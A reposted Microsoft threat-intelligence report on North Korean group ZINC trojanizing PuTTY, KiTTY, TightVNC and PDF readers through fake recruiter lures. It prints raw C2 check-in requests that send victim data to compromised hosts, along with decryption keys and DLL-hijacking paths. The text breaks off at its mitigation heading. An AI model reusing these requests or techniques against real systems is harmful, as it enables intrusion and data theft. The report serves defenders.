{"id":20227,"date":"2022-09-29T09:00:54","date_gmt":"2022-09-29T17:00:54","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/09\/29\/news-13960\/"},"modified":"2022-09-29T09:00:54","modified_gmt":"2022-09-29T17:00:54","slug":"news-13960","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/09\/29\/news-13960\/","title":{"rendered":"ZINC weaponizing open-source software"},"content":{"rendered":"

Credit to Author: Katie McCafferty| Date: Thu, 29 Sep 2022 16:00:00 +0000<\/strong><\/p>\n

In recent months, Microsoft has detected a wide range of social engineering campaigns using weaponized legitimate open-source software by an actor we track as ZINC<\/a>. Microsoft Threat Intelligence Center (MSTIC) observed activity targeting employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on espionage, data theft, financial gain, and network destruction.<\/p>\n

Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.<\/p>\n

MSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF\/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022. The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant<\/a> earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.<\/p>\n

Microsoft Defender for Endpoint provides comprehensive protection against tools and custom malware used by ZINC, including ZetaNile. The hunting queries provided at the end of this blog will help customers comprehensively search their environments for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. <\/p>\n

Who is ZINC? <\/h2>\n

ZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the activity group gained further public notoriety in 2014 following their successful attack against Sony Pictures Entertainment. ZINC is known to use a variety of custom remote access tools (RATs) as part of their arsenal, including those detected by Microsoft as FoggyBrass and PhantomStar.  <\/p>\n

Microsoft researchers have observed spear-phishing as a primary tactic of ZINC actors, but they have also been observed using strategic website compromises and social engineering across social media to achieve their objectives. ZINC targets employees of companies it\u2019s attempting to infiltrate and seeks to coerce these individuals into installing seemingly benign programs or opening weaponized documents that contain malicious macros. Targeted attacks have also been carried out against security researchers<\/a> over Twitter and LinkedIn.<\/p>\n

ZINC attacks appear to be motivated by traditional cyberespionage, theft of personal and corporate data, financial gain, and corporate network destruction. ZINC attacks bear many hallmarks of state-sponsored activities, such as heightened operational security, sophisticated malware that evolves over time, and politically motivated targeting.<\/p>\n

ZINC, tracked by other security companies as Labyrinth Chollima and Black Artemis, has been observed conducting this campaign from late April to mid-September 2022.<\/p>\n

\"Attack
Figure 1. Attack flow diagram for recent ZINC campaign<\/figcaption><\/figure>\n

Observed actor activity<\/h2>\n

Impersonation and establishing contact<\/h3>\n

LinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters working at technology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn and to the encrypted messaging app WhatsApp for the delivery of malware. ZINC primarily targeted engineers and technical support professionals working at media and information technology companies located in the UK, India, and the US. Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies. In accordance with their policies, for accounts identified in these attacks, LinkedIn quickly terminated any accounts associated with inauthentic or fraudulent behavior.<\/p>\n

\"Fraudulent
Figure 2. Fraudulent recruiter profile<\/figcaption><\/figure>\n

Multiple methods used for delivery of ZetaNile<\/h3>\n

MSTIC has observed at least five methods of trojanized open-source applications containing the malicious payload and shellcode that is tracked as the ZetaNile malware family. The ZetaNile implants, also known as BLINDINGCAN, have been covered in CISA<\/a> and JPCERT<\/a> reports. The implant DLLs in the ZetaNile malware family are either packed with commercial software protectors such as Themida and VMProtect or are encrypted using custom algorithms. The payload in the malicious DLL is decrypted using a custom key, passed as part of the DLL search order hijacking of the legitimate Windows process, as shown in Figure 3. The ZetaNile implants use unique custom encryption methods or AES encryption to generate command and control (C2) HTTP requests to known compromised C2 domains. By encoding the victim information in the parameters for common keywords like gametype<\/em> or bbs <\/em>in the HTTP POSTs, these C2 communications can blend in with legitimate traffic.<\/p>\n

Weaponization of SSH clients<\/h3>\n

Once they have established a connection with their target, ZINC operationalized malicious versions of two SSH clients, PuTTY and KiTTY, that acted as the entry vector for the ZetaNile implant. Both utilities provide terminal emulator support for different networking protocols, making them attractive programs for individuals commonly targeted by ZINC. The weaponized versions were often delivered as compressed ZIP archives or ISO files. Within that archive, the recipient is provided a ReadMe.txt<\/em> and an executable file to run. As part of the evolution of ZINC\u2019s malware development, and in an effort to evade traditional defenses, running the included executable does not drop the ZetaNile implant. For ZetaNile to be deployed, the SSH utility requires the IP provided in the ReadMe.txt<\/em> file. An example of the content of that file is provided below:<\/p>\n

Server: 137[.]184[.]15[.]189 User: [redacted] Pass: [redacted] <\/pre>\n
Weaponized PuTTY malware<\/h4>\n
ZINC has been using trojanized PuTTY as part of its attack chain for many years, and this most recent variant establishes persistence on compromised devices by utilizing scheduled tasks. This activity was recently reported by Mandiant. The malicious PUTTY.exe<\/em> is configured to install the Event Horizon malware in C:ProgramDatacolorui.dll<\/em> and subsequently copy C:WindowsSystem32colorcpl.exe<\/em> to C:ProgramDatacolorcpl.exe<\/em>.  By using DLL search order hijacking, ZINC can load the second stage malware, colurui.dll<\/em>, and decode the payload with the key \u201c0CE1241A44557AA438F27BC6D4ACA246\u201d to be used for command and control. Upon successful connection to the C2 server, the attackers can install additional malware on the compromised device for other tasks.<\/p>\n
Lastly, persistence is established with the creation of a daily scheduled task, PackageColor<\/em>, as part of the configuration for the weaponized PuTTY. ZINC accomplishes this with the following command:<\/p>\n
\"PuTTY
Figure 3. PuTTY – scheduled task as part of persistence<\/figcaption><\/figure>\n
Weaponized KiTTY malware<\/h4>\n
While ZINC has utilized weaponized PuTTY for many years, ZINC has only recently expanded their capabilities to include weaponizing a fork of PuTTY called KiTTY. The executable first collects the username and hostname of the victim system and sends that information to a hardcoded IP 172[.]93[.]201[.]253 over TCP\/22. Upon successful TCP connection to the server at 137[.]184[.]15[.]189, the malicious KiTTY executable then deploys the malware as %AppData%mscoree.dll <\/em>following multiple rounds of decoding. The mscoree.dll<\/em> file is the embedded payload, detected as EventHorizon, in the ZetaNile malware family. Similar to ZINC\u2019s version of PuTTY, the actor uses DLL search order hijacking to load malicious DLL files that perform tasks within the context of these legitimate Windows processes, specifically through %<\/em>AppData%KiTTY%PresentationHost.exe -EmbeddingObject<\/em>.<\/p>\n
\"Screenshot
Figure 4. KiTTY – DLL search order hijacking<\/figcaption><\/figure>\n
The mscoree.dll<\/em> malware is modularized in such a way that, upon successful connection to the compromised C2 domain, the attackers can install additional malware on the target system as needed using the existing C2 communication, such as executing C:ProgramDataCiscofixmapi.exe -s AudioEndpointBuilder<\/em> to load malicious mapistub.dll<\/em> from the compromised C2 server. The HTTP POST requests contain the hardcoded user agent string with misspelled \u201cEdge\u201d, as detailed below, and contain a unique ID for the field gametype<\/em> and the hardcoded value for the field type <\/em>for malware campaign tracking purposes:<\/p>\n
\n\n\n\n
POST \/wp-includes\/php-compat\/compat.php HTTP\/1.1 
Accept: text\/* 
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.5005.63 Safari\/537.36 Edg<\/strong>\/100.0.1185.39 
Content-Type: application\/x-www-form-urlencoded 
Content-Length: 39 
Host: olidhealth[.]com 
Connection: Keep-Alive 
Cache-Control: no-cache   <\/p>\n
gametype<\/strong>=[UniqueId]&type<\/strong>=O8Akm8aV09Nw412KoWJds<\/strong>  <\/strong><\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n
Weaponized TightVNC Viewer<\/h3>\n
Beginning in September 2022, ZINC was observed utilizing a trojanized TightVNC Viewer that was delivered to a target alongside a weaponized SSH utility over WhatsApp. This malware has a unique PDBPath:<\/p>\n
N:2.MyDevelopment3.Tools_Development4.TightVNCCustomizeMunna_Customizetightvncx64\\Releasetvnviewer.pdb<\/pre>\n
The weaponized versions of TightVNC Viewer often were delivered as compressed ZIP archives or job description-themed ISO files via online platforms such as WhatsApp. Within that archive, the recipient is provided a ReadMe.txt<\/em> and an executable file to run. The .txt file has the following content:<\/p>\n
Platform: 2nd from the list User: [redacted] Pass: [redacted]<\/pre>\n
As part of the threat actor\u2019s latest malware technique to evade traditional defenses, the malicious TightVNC Viewer has a pre-populated list of remote hosts, and it\u2019s configured to install the backdoor only when the user selects ec2-aet-tech.w-ada[.]amazonaws<\/em> from the drop-down menu in the TightVNC Viewer, as shown in Figure 5:<\/p>\n
\"Weaponized
Figure 5. Weaponized TightVNC Viewer \u2013 user interface<\/figcaption><\/figure>\n
The malware was configured to send the username and hostname to IP 44[.]238[.]74[.]84 on TCP\/22 as part of the victim check-in with the C2 and establish VNC connections to the same IP on port TCP\/5900. Once a successful connection is established to the server IP, the embedded second stage DLL payload from TightVNC.exe<\/em> is loaded in memory to establish C2 communication to a known compromised domain.<\/p>\n
Weaponization of Sumatra PDF reader and muPDF\/Subliminal Recording installer<\/h3>\n
ZINC has operationalized malicious versions of two PDF readers, Sumatra PDF and muPDF\/Subliminal Recording installer, that act as the entry vector for the ZetaNile implant. This delivery mechanism is often utilized in relation to fraudulent job postings delivered to job-seeking targets in the IT and defense sector. The weaponized versions were often delivered as compressed ZIP archives. Within that archive, the recipient is provided with an executable file to run. While the malicious Sumatra PDF reader is a fully functional PDF reader that can load the malicious implant from a fake PDF, the muPDF\/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files.<\/p>\n
Trojanized Sumatra PDF Reader<\/h4>\n
The trojanized version of Sumatra PDF Reader named SecurePDF.exe<\/em> has been utilized by ZINC since at least 2019 and remains a unique ZINC tradecraft. SecurePDF.exe<\/em> is a modularized loader that can install the ZetaNile implant by loading a weaponized job application themed file with a .PDF extension. The fake PDF contains a header \u201cSPV005\u201d, a decryption key, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when the file is opened.<\/p>\n
Once loaded in memory, the second stage malware is configured to send the victim\u2019s system hostname and device information using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The attackers can install additional malware onto the compromised devices using the C2 communication as needed.<\/p>\n
\"SecurePDF
Figure 6. SecurePDF interface<\/figcaption><\/figure>\n
Trojanized muPDF\/Subliminal Recording installer<\/h4>\n
Within the trojanized version of muPDF\/Subliminal Recording installer, setup.exe<\/em> is configured to check if the file path ISSetupPrerequisitesSetup64.exe<\/em> exists and write C:colrctlcolorui.dll<\/em> on disk after extracting the embedded executable inside setup.exe<\/em>. It then copies C:WindowsSystem32ColorCpl.exe<\/em> to C:ColorCtrlColorCpl.exe<\/em>. For the second stage malware, the malicious installer creates a new process C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6D<\/em>, and the argument C3A9B30B6A313F289297C9A36730DB6D<\/em> gets passed on to colorui.dll <\/em>as a decryption key.<\/em> The DLL colorui.dll, <\/em>which Microsoft is tracking as the EventHorizon malware family, is injected into C:WindowsSystemcredwiz.exe<\/em> or iexpress.exe<\/em> to send C2 HTTP requests as part of the victim check-in process and to get an additional payload.<\/p>\n
\n\n\n\n
POST \/support\/support.asp HTTP\/1.1 
Cache-Control: no-cache 
Connection: close 
Content-Type: application\/x-www-form-urlencoded 
Accept: *\/* 
User-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; 
Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; 
InfoPath.3; .NET4.0C; .NET4.0E) 
Content-Length: 125 
Host: www.elite4print[.]com   <\/p>\n
bbs=[encrypted payload]= &article=[encrypted payload] <\/code> <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n
Microsoft will continue to monitor ZINC activity and implement protections for our customers. The current detections and IOCs in place across our security products are detailed below.<\/p>\n
Recommended customer actions<\/h2>\n
The techniques used by the actor and described in the \u201cObserved actor activity\u201d section can be mitigated by adopting the security considerations provided below:<\/p>\n